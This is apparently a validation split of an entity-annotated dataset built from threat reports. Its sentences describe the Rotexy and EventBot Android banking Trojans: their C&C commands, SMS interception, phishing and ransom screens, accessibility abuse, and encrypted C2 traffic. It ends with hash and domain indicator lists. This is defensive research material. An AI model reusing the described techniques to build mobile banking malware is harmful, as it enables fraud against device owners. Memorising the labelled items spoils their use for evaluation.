{"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions .", "spans": {}, "info": {"id": "cyner_valid_000179", "source": "cyner_valid"}}
{"text": "If the privileges are revoked successfully , the Trojan relaunches the cycle of requesting administrator privileges .", "spans": {}, "info": {"id": "cyner_valid_000180", "source": "cyner_valid"}}
{"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation – in this case , it relaunches ; sending of an SMS by the app – in this case , the phone is switched to silent mode .", "spans": {"Malware: Rotexy": [[198, 204]]}, "info": {"id": "cyner_valid_000181", "source": "cyner_valid"}}
{"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner .", "spans": {"Malware: Rotexy": [[67, 73]]}, "info": {"id": "cyner_valid_000182", "source": "cyner_valid"}}
{"text": "Depending on the Trojan version , dynamically generated subdomains can also be used .", "spans": {}, "info": {"id": "cyner_valid_000183", "source": "cyner_valid"}}
{"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database .", "spans": {}, "info": {"id": "cyner_valid_000184", "source": "cyner_valid"}}
{"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C .", "spans": {"Malware: Rotexy": [[212, 218]]}, "info": {"id": "cyner_valid_000185", "source": "cyner_valid"}}
{"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn ’ t notice that a new SMS has arrived .", "spans": {}, "info": {"id": "cyner_valid_000186", "source": "cyner_valid"}}
{"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message .", "spans": {}, "info": {"id": "cyner_valid_000187", "source": "cyner_valid"}}
{"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address .", "spans": {}, "info": {"id": "cyner_valid_000188", "source": "cyner_valid"}}
{"text": ") If the application hasn ’ t received instructions about the rules for processing incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C .", "spans": {}, "info": {"id": "cyner_valid_000189", "source": "cyner_valid"}}
{"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C .", "spans": {}, "info": {"id": "cyner_valid_000190", "source": "cyner_valid"}}
{"text": "It ’ s possible the threat actors use this list to find running antivirus or banking applications .", "spans": {}, "info": {"id": "cyner_valid_000191", "source": "cyner_valid"}}
{"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART — start , stop , restart SuperService .", "spans": {"Malware: Rotexy": [[0, 6]]}, "info": {"id": "cyner_valid_000192", "source": "cyner_valid"}}
{"text": "URL — update C & C address .", "spans": {}, "info": {"id": "cyner_valid_000193", "source": "cyner_valid"}}
{"text": "MESSAGE – send SMS containing specified text to a specified number .", "spans": {}, "info": {"id": "cyner_valid_000194", "source": "cyner_valid"}}
{"text": "UPDATE_PATTERNS – reregister in the administration panel .", "spans": {}, "info": {"id": "cyner_valid_000195", "source": "cyner_valid"}}
{"text": "UNBLOCK – unblock the telephone ( revoke device administrator privileges from the app ) .", "spans": {}, "info": {"id": "cyner_valid_000196", "source": "cyner_valid"}}
{"text": "UPDATE – download APK file from C & C and install it .", "spans": {}, "info": {"id": "cyner_valid_000197", "source": "cyner_valid"}}
{"text": "This command can be used not just to update the app but to install any other software on the infected device .", "spans": {}, "info": {"id": "cyner_valid_000198", "source": "cyner_valid"}}
{"text": "CONTACTS – send text received from C & C to all user contacts .", "spans": {}, "info": {"id": "cyner_valid_000199", "source": "cyner_valid"}}
{"text": "This is most probably how the application spreads .", "spans": {}, "info": {"id": "cyner_valid_000200", "source": "cyner_valid"}}
{"text": "CONTACTS_PRO – request unique message text for contacts from the address book .", "spans": {}, "info": {"id": "cyner_valid_000201", "source": "cyner_valid"}}
{"text": "PAGE – contact URL received from C & C using User-Agent value that was also received from C & C or local database .", "spans": {}, "info": {"id": "cyner_valid_000202", "source": "cyner_valid"}}
{"text": "ALLMSG – send C & C all SMSs received and sent by user , as stored in phone memory .", "spans": {}, "info": {"id": "cyner_valid_000203", "source": "cyner_valid"}}
{"text": "ALLCONTACTS – send all contacts from phone memory to C & C .", "spans": {}, "info": {"id": "cyner_valid_000204", "source": "cyner_valid"}}
{"text": "ONLINE – send information about Trojan ’ s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc .", "spans": {}, "info": {"id": "cyner_valid_000205", "source": "cyner_valid"}}
{"text": "NEWMSG – write an SMS to the device memory containing the text and sender number sent from C & C .", "spans": {}, "info": {"id": "cyner_valid_000206", "source": "cyner_valid"}}
{"text": "CHANGE_GCM_ID – change GCM ID .", "spans": {}, "info": {"id": "cyner_valid_000207", "source": "cyner_valid"}}
{"text": "BLOCKER_BANKING_START – display phishing HTML page for entry of bank card details .", "spans": {}, "info": {"id": "cyner_valid_000208", "source": "cyner_valid"}}
{"text": "BLOCKER_EXTORTIONIST_START – display HTML page of the ransomware .", "spans": {}, "info": {"id": "cyner_valid_000209", "source": "cyner_valid"}}
{"text": "BLOCKER_UPDATE_START – display fake HTML page for update .", "spans": {}, "info": {"id": "cyner_valid_000210", "source": "cyner_valid"}}
{"text": "BLOCKER_STOP – block display of all HTML pages .", "spans": {}, "info": {"id": "cyner_valid_000211", "source": "cyner_valid"}}
{"text": "The C & C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs .", "spans": {"Malware: Rotexy": [[19, 25]]}, "info": {"id": "cyner_valid_000212", "source": "cyner_valid"}}
{"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : “ 3458 ” — revoke device administrator privileges from the app ; “ hi ” , “ ask ” — enable and disable mobile internet ; “ privet ” , “ ru ” — enable and disable Wi-Fi ; “ check ” — send text “ install : [ device IMEI ] ” to phone number from which SMS was sent ; “ stop_blocker ” — stop displaying all blocking HTML pages ; “ 393838 ” — change C & C address to that specified in the", "spans": {}, "info": {"id": "cyner_valid_000213", "source": "cyner_valid"}}
{"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C .", "spans": {"Malware: Rotexy": [[43, 49]]}, "info": {"id": "cyner_valid_000215", "source": "cyner_valid"}}
{"text": "The server then sends a reply that contains instructions on further actions to be taken .", "spans": {}, "info": {"id": "cyner_valid_000216", "source": "cyner_valid"}}
{"text": "Displaying HTML pages We ’ ll now look at the HTML pages that Rotexy displays and the actions performed with them .", "spans": {"Malware: Rotexy": [[62, 68]]}, "info": {"id": "cyner_valid_000217", "source": "cyner_valid"}}
{"text": "The Trojan displays a fake HTML update page ( update.html ) that blocks the device ’ s screen for a long period of time .", "spans": {}, "info": {"id": "cyner_valid_000218", "source": "cyner_valid"}}
{"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it .", "spans": {}, "info": {"id": "cyner_valid_000219", "source": "cyner_valid"}}
{"text": "The sexually explicit images in this screenshot have been covered with a black box .", "spans": {}, "info": {"id": "cyner_valid_000220", "source": "cyner_valid"}}
{"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details .", "spans": {}, "info": {"id": "cyner_valid_000221", "source": "cyner_valid"}}
{"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information .", "spans": {}, "info": {"id": "cyner_valid_000222", "source": "cyner_valid"}}
{"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers .", "spans": {}, "info": {"id": "cyner_valid_000223", "source": "cyner_valid"}}
{"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account .", "spans": {}, "info": {"id": "cyner_valid_000225", "source": "cyner_valid"}}
{"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command .", "spans": {}, "info": {"id": "cyner_valid_000226", "source": "cyner_valid"}}
{"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number .", "spans": {"Malware: Rotexy": [[96, 102]]}, "info": {"id": "cyner_valid_000227", "source": "cyner_valid"}}
{"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits .", "spans": {}, "info": {"id": "cyner_valid_000228", "source": "cyner_valid"}}
{"text": "If the user has provided the details of another card , then the following window is displayed : The application leaves the user with almost no option but to enter the correct card number , as it checks the entered number against the bank card details the cybercriminals received earlier .", "spans": {}, "info": {"id": "cyner_valid_000229", "source": "cyner_valid"}}
{"text": "How to unblock the phone Now for some good news : Rotexy doesn ’ t have a very well-designed module for processing commands that arrive in SMSs .", "spans": {"Malware: Rotexy": [[50, 56]]}, "info": {"id": "cyner_valid_000231", "source": "cyner_valid"}}
{"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages .", "spans": {}, "info": {"id": "cyner_valid_000232", "source": "cyner_valid"}}
{"text": "This is done by sending “ 3458 ” in an SMS to the blocked device – this will revoke the administrator privileges from the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000233", "source": "cyner_valid"}}
{"text": "After that it ’ s necessary to send “ stop_blocker ” to the same number – this will disable the display of HTML pages that extort money and block the screen .", "spans": {}, "info": {"id": "cyner_valid_000234", "source": "cyner_valid"}}
{"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program .", "spans": {"Malware: Rotexy": [[0, 6]]}, "info": {"id": "cyner_valid_000235", "source": "cyner_valid"}}
{"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000236", "source": "cyner_valid"}}
{"text": "In that case , you first need to send the text “ 393838 ” in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to “ : // ” , so the phone will no longer receive commands from the real C & C .", "spans": {}, "info": {"id": "cyner_valid_000237", "source": "cyner_valid"}}
{"text": "However , it ’ s possible the set of commands may change in future versions of the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000239", "source": "cyner_valid"}}
{"text": "Geography of Rotexy attacks According to our data , 98 % of all Rotexy attacks target users in Russia .", "spans": {"Malware: Rotexy": [[13, 19], [64, 70]]}, "info": {"id": "cyner_valid_000240", "source": "cyner_valid"}}
{"text": "Indeed , the Trojan explicitly targets Russian-speaking users .", "spans": {}, "info": {"id": "cyner_valid_000241", "source": "cyner_valid"}}
{"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected .", "spans": {}, "info": {"id": "cyner_valid_000242", "source": "cyner_valid"}}
{"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386", "spans": {}, "info": {"id": "cyner_valid_000244", "source": "cyner_valid"}}
{"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84", "spans": {}, "info": {"id": "cyner_valid_000245", "source": "cyner_valid"}}
{"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby.ru darkclub.net holerole.org googleapis.link 2015–2016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw", "spans": {}, "info": {"id": "cyner_valid_000246", "source": "cyner_valid"}}
{"text": "2016 freedns.website streamout.space 2017–2018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 .", "spans": {"Malware: EventBot": [[94, 102], [217, 225]], "Organization: Cybereason Nocturnus": [[174, 194]], "System: Android": [[242, 249]]}, "info": {"id": "cyner_valid_000247", "source": "cyner_valid"}}
{"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more .", "spans": {"System: Paypal Business": [[41, 56]], "System: Revolut": [[59, 66]], "System: Barclays": [[69, 77]], "System: UniCredit": [[80, 89]], "System: CapitalOne UK": [[92, 105]], "System: HSBC UK": [[108, 115]], "System: Santander UK": [[118, 130]], "System: TransferWise": [[133, 145]], "System: Coinbase": [[148, 156]], "System: paysafecard": [[159, 170]]}, "info": {"id": "cyner_valid_000250", "source": "cyner_valid"}}
{"text": "It specifically targets financial banking applications across the United States and Europe , including Italy , the UK , Spain , Switzerland , France , and Germany .", "spans": {}, "info": {"id": "cyner_valid_000251", "source": "cyner_valid"}}
{"text": "The full list of banking applications targeted is included in the appendix .", "spans": {}, "info": {"id": "cyner_valid_000252", "source": "cyner_valid"}}
{"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications .", "spans": {}, "info": {"id": "cyner_valid_000254", "source": "cyner_valid"}}
{"text": "This research gives a rare look into the process improvements malware authors make when optimizing before launch .", "spans": {}, "info": {"id": "cyner_valid_000255", "source": "cyner_valid"}}
{"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware .", "spans": {}, "info": {"id": "cyner_valid_000256", "source": "cyner_valid"}}
{"text": "TABLE OF CONTENTS Security Recommendations Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources .", "spans": {"Malware: EventBot": [[194, 202]], "Organization: MITRE": [[272, 277]]}, "info": {"id": "cyner_valid_000257", "source": "cyner_valid"}}
{"text": "Keep Google Play Protect on .", "spans": {"System: Google Play Protect": [[5, 24]]}, "info": {"id": "cyner_valid_000258", "source": "cyner_valid"}}
{"text": "Do not download mobile apps from unofficial or unauthorized sources .", "spans": {}, "info": {"id": "cyner_valid_000259", "source": "cyner_valid"}}
{"text": "Most legitimate Android apps are available on the Google Play Store .", "spans": {"System: Android": [[16, 23]], "System: Google Play Store": [[50, 67]]}, "info": {"id": "cyner_valid_000260", "source": "cyner_valid"}}
{"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests .", "spans": {}, "info": {"id": "cyner_valid_000261", "source": "cyner_valid"}}
{"text": "When in doubt , check the APK signature and hash in sources like VirusTotal before installing it on your device .", "spans": {"Organization: VirusTotal": [[65, 75]]}, "info": {"id": "cyner_valid_000262", "source": "cyner_valid"}}
{"text": "Use mobile threat detection solutions for enhanced security .", "spans": {}, "info": {"id": "cyner_valid_000263", "source": "cyner_valid"}}
{"text": "INTRODUCTION For the past few weeks , the Cybereason Nocturnus team has been investigating a new type of Android malware dubbed EventBot , which was first identified in March 2020 .", "spans": {"Organization: Cybereason Nocturnus": [[42, 62]], "System: Android": [[105, 112]], "Malware: EventBot": [[128, 136]]}, "info": {"id": "cyner_valid_000264", "source": "cyner_valid"}}
{"text": "This malware appears to be newly developed with code that differs significantly from previously known Android malware .", "spans": {"System: Android": [[102, 109]]}, "info": {"id": "cyner_valid_000265", "source": "cyner_valid"}}
{"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000266", "source": "cyner_valid"}}
{"text": "EventBot abuses Android ’ s accessibility feature to access valuable user information , system information , and data stored in other applications .", "spans": {"Malware: EventBot": [[0, 8]], "System: Android": [[16, 23]]}, "info": {"id": "cyner_valid_000267", "source": "cyner_valid"}}
{"text": "In particular , EventBot can intercept SMS messages and bypass two-factor authentication mechanisms .", "spans": {"Malware: EventBot": [[16, 24]]}, "info": {"id": "cyner_valid_000268", "source": "cyner_valid"}}
{"text": "The Cybereason Nocturnus team has concluded that EventBot is designed to target over 200 different banking and finance applications , the majority of which are European bank and crypto-currency exchange applications .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[49, 57]]}, "info": {"id": "cyner_valid_000269", "source": "cyner_valid"}}
{"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data .", "spans": {"Malware: Eventbot": [[38, 46]]}, "info": {"id": "cyner_valid_000270", "source": "cyner_valid"}}
{"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place .", "spans": {}, "info": {"id": "cyner_valid_000271", "source": "cyner_valid"}}
{"text": "Mobile malware is a significant risk for organizations and consumers alike , and must be considered when protecting personal and business data .", "spans": {}, "info": {"id": "cyner_valid_000272", "source": "cyner_valid"}}
{"text": "EventBot mobile banking applications targetedApplications targeted by EventBot .", "spans": {"Malware: EventBot": [[0, 8], [70, 78]]}, "info": {"id": "cyner_valid_000273", "source": "cyner_valid"}}
{"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot .", "spans": {"Organization: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[64, 72]]}, "info": {"id": "cyner_valid_000274", "source": "cyner_valid"}}
{"text": "THREAT ANALYSIS Initial Access Though EventBot is not currently on the Google Play Store , we were able to find several icons EventBot is using to masquerade as a legitimate application .", "spans": {"Malware: EventBot": [[38, 46], [126, 134]], "System: Google Play": [[71, 82]]}, "info": {"id": "cyner_valid_000275", "source": "cyner_valid"}}
{"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications .", "spans": {}, "info": {"id": "cyner_valid_000276", "source": "cyner_valid"}}
{"text": "Icons used for EventBot masqueraded as legitimate with these icons.application .", "spans": {"Malware: EventBot": [[15, 23]]}, "info": {"id": "cyner_valid_000277", "source": "cyner_valid"}}
{"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 .", "spans": {"Organization: Cybereason Nocturnus": [[25, 45]], "Malware: EventBot": [[70, 78]]}, "info": {"id": "cyner_valid_000278", "source": "cyner_valid"}}
{"text": "At the time of writing this research , four versions of the EventBot malware were observed : Version 0.0.0.1 , 0.0.0.2 , and 0.3.0.1 and 0.4.0.1 .", "spans": {"Malware: EventBot": [[60, 68]]}, "info": {"id": "cyner_valid_000280", "source": "cyner_valid"}}
{"text": "Each version expands the bot ’ s functionality and works to obfuscate the malware against analysis .", "spans": {}, "info": {"id": "cyner_valid_000281", "source": "cyner_valid"}}
{"text": "In this research , we review common features of the malware and examine the improvements the threat actor made in each version .", "spans": {}, "info": {"id": "cyner_valid_000282", "source": "cyner_valid"}}
{"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps .", "spans": {"Malware: EventBot": [[45, 53]]}, "info": {"id": "cyner_valid_000283", "source": "cyner_valid"}}
{"text": "READ_EXTERNAL_STORAGE - read from external storage .", "spans": {}, "info": {"id": "cyner_valid_000284", "source": "cyner_valid"}}
{"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages .", "spans": {}, "info": {"id": "cyner_valid_000285", "source": "cyner_valid"}}
{"text": "INTERNET - open network sockets .", "spans": {}, "info": {"id": "cyner_valid_000286", "source": "cyner_valid"}}
{"text": "REQUEST_IGNORE_BATTERY_OPTIMIZATIONS - whitelist the app to allow it to ignore battery optimizations .", "spans": {}, "info": {"id": "cyner_valid_000287", "source": "cyner_valid"}}
{"text": "ACCESS_NETWORK_STATE - allow the app to access information about networks .", "spans": {}, "info": {"id": "cyner_valid_000289", "source": "cyner_valid"}}
{"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background .", "spans": {}, "info": {"id": "cyner_valid_000290", "source": "cyner_valid"}}
{"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background .", "spans": {}, "info": {"id": "cyner_valid_000291", "source": "cyner_valid"}}
{"text": "RECEIVE_BOOT_COMPLETED - allow the application to launch itself after system boot .", "spans": {}, "info": {"id": "cyner_valid_000292", "source": "cyner_valid"}}
{"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000293", "source": "cyner_valid"}}
{"text": "RECEIVE_SMS - allow the application to receive text messages .", "spans": {}, "info": {"id": "cyner_valid_000294", "source": "cyner_valid"}}
{"text": "READ_SMS - allow the application to read text messages .", "spans": {}, "info": {"id": "cyner_valid_000295", "source": "cyner_valid"}}
{"text": "EventBot permissions EventBot ’ s permissions as seen in the manifest file .", "spans": {"Malware: EventBot": [[0, 8], [21, 29]]}, "info": {"id": "cyner_valid_000296", "source": "cyner_valid"}}
{"text": "THE INITIAL INSTALLATION PROCESS Once installed , EventBot prompts the user to give it access to accessibility services .", "spans": {"Malware: EventBot": [[50, 58]]}, "info": {"id": "cyner_valid_000297", "source": "cyner_valid"}}
{"text": "Initial request by EventBot Initial request by EventBot to run as a service .", "spans": {"Malware: EventBot": [[19, 27], [47, 55]]}, "info": {"id": "cyner_valid_000298", "source": "cyner_valid"}}
{"text": "Once the malware can use accessibility services , it has the ability to operate as a keylogger and can retrieve notifications about other installed applications and content of open windows .", "spans": {}, "info": {"id": "cyner_valid_000299", "source": "cyner_valid"}}
{"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher .", "spans": {"System: Android": [[31, 38]], "Malware: EventBot": [[41, 49]]}, "info": {"id": "cyner_valid_000301", "source": "cyner_valid"}}
{"text": "EventBot requests permissions to always run in the background .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000302", "source": "cyner_valid"}}
{"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets .", "spans": {"Malware: EventBot": [[96, 104], [139, 147]]}, "info": {"id": "cyner_valid_000303", "source": "cyner_valid"}}
{"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 .", "spans": {"Malware: EventBot": [[93, 101]]}, "info": {"id": "cyner_valid_000304", "source": "cyner_valid"}}
{"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 .", "spans": {}, "info": {"id": "cyner_valid_000305", "source": "cyner_valid"}}
{"text": "The RC4 key is hardcoded in EventBot .", "spans": {"Malware: EventBot": [[28, 36]]}, "info": {"id": "cyner_valid_000306", "source": "cyner_valid"}}
{"text": "Upon decryption , we can see that the response from the server is a JSON object of EventBot ’ s configuration , which contains C2 URLs and a targeted applications list .", "spans": {"Malware: EventBot": [[83, 91]]}, "info": {"id": "cyner_valid_000307", "source": "cyner_valid"}}
{"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 .", "spans": {"Malware: EventBot": [[10, 18], [43, 51]]}, "info": {"id": "cyner_valid_000308", "source": "cyner_valid"}}
{"text": "This version includes 185 different applications , including official applications of worldwide banks .", "spans": {}, "info": {"id": "cyner_valid_000310", "source": "cyner_valid"}}
{"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain .", "spans": {}, "info": {"id": "cyner_valid_000311", "source": "cyner_valid"}}
{"text": "In addition to official banking applications , the target list includes 111 other global financial applications for banking and credit card management , money transfers , and cryptocurrency wallets and exchanges .", "spans": {}, "info": {"id": "cyner_valid_000313", "source": "cyner_valid"}}
{"text": "Those targeted include Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more .", "spans": {"System: Paypal Business": [[23, 38]], "System: Revolut": [[41, 48]], "System: Barclays": [[51, 59]], "System: UniCredit": [[62, 71]], "System: CapitalOne UK": [[74, 87]], "System: HSBC UK": [[90, 97]], "System: Santander UK": [[100, 112]], "System: TransferWise": [[115, 127]], "System: Coinbase": [[130, 138]], "System: paysafecard": [[141, 152]]}, "info": {"id": "cyner_valid_000314", "source": "cyner_valid"}}
{"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity .", "spans": {"Malware: EventBot": [[32, 40]], "System: Android": [[78, 85]]}, "info": {"id": "cyner_valid_000316", "source": "cyner_valid"}}
{"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot .", "spans": {"Malware: EventBot": [[135, 143]]}, "info": {"id": "cyner_valid_000318", "source": "cyner_valid"}}
{"text": "EventBot uses multiple methods to exploit accessibility events for webinjects and other information stealing purposes .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000319", "source": "cyner_valid"}}
{"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000322", "source": "cyner_valid"}}
{"text": "In later versions , another encryption layer is added using Curve25519 encryption .", "spans": {}, "info": {"id": "cyner_valid_000324", "source": "cyner_valid"}}
{"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES .", "spans": {"Malware: EventBot": [[35, 43]], "System: ChaCha20": [[54, 62]]}, "info": {"id": "cyner_valid_000325", "source": "cyner_valid"}}
{"text": "SMS grabbing : EventBot has the ability to parse SMS messages by using the targeted device ’ s SDK version to parse them correctly .", "spans": {"Malware: EventBot": [[15, 23]]}, "info": {"id": "cyner_valid_000327", "source": "cyner_valid"}}
{"text": "EventBot parsing of grabbed SMS messages Parsing of grabbed SMS messages .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000328", "source": "cyner_valid"}}
{"text": "Webinjects : According to the bot ’ s configuration , if a webinject is set for a given application , it will be executed .", "spans": {}, "info": {"id": "cyner_valid_000329", "source": "cyner_valid"}}
{"text": "BOT UPDATES EventBot has a long method called parseCommand that can update EventBot ’ s configuration XML files , located in the shared preferences folder on the device .", "spans": {"Malware: EventBot": [[12, 20], [75, 83]]}, "info": {"id": "cyner_valid_000331", "source": "cyner_valid"}}
{"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000332", "source": "cyner_valid"}}
{"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000333", "source": "cyner_valid"}}
{"text": "The following code shows EventBot parsing instructions sent from the C2 .", "spans": {"Malware: EventBot": [[25, 33]]}, "info": {"id": "cyner_valid_000334", "source": "cyner_valid"}}
{"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 .", "spans": {"Malware: EventBot": [[27, 35], [85, 93]]}, "info": {"id": "cyner_valid_000336", "source": "cyner_valid"}}
{"text": "As mentioned above , EventBot Version 0.0.0.1 sends a JSON object containing the Android package names of all the apps installed on the victim ’ s device alongside additional metadata , including the bot version , botnetID , and the reason this package is sent .", "spans": {"Malware: EventBot": [[21, 29]], "System: Android": [[81, 88]]}, "info": {"id": "cyner_valid_000337", "source": "cyner_valid"}}
{"text": "If the connection to the C2 fails , it will continue to retry until it is successful .", "spans": {}, "info": {"id": "cyner_valid_000339", "source": "cyner_valid"}}
{"text": "EVENTBOT VERSION 0.0.0.2 Dynamic Library Loading As of Version 0.0.0.2 , EventBot attempts to hide its main functionality from static analysis .", "spans": {"Malware: EVENTBOT": [[0, 8]], "Malware: EventBot": [[73, 81]]}, "info": {"id": "cyner_valid_000341", "source": "cyner_valid"}}
{"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module .", "spans": {"Malware: EventBot": [[31, 39]]}, "info": {"id": "cyner_valid_000343", "source": "cyner_valid"}}
{"text": "EventBot loaded library Loaded library as seen in Logcat .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000344", "source": "cyner_valid"}}
{"text": "By browsing EventBot ’ s installation path on the device , we can see the library dropped in the app_dex folder .", "spans": {"Malware: EventBot": [[12, 20]]}, "info": {"id": "cyner_valid_000345", "source": "cyner_valid"}}
{"text": "EventBot loaded library The loaded library dropped on the device .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000346", "source": "cyner_valid"}}
{"text": "The code to load the main module dynamically can also be seen statically .", "spans": {}, "info": {"id": "cyner_valid_000347", "source": "cyner_valid"}}
{"text": "The malicious library is loaded from Eventbot ’ s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 .", "spans": {"Malware: Eventbot": [[37, 45]]}, "info": {"id": "cyner_valid_000348", "source": "cyner_valid"}}
{"text": "EventBot method responsible for the library loading The method responsible for the library loading .", "spans": {}, "info": {"id": "cyner_valid_000349", "source": "cyner_valid"}}
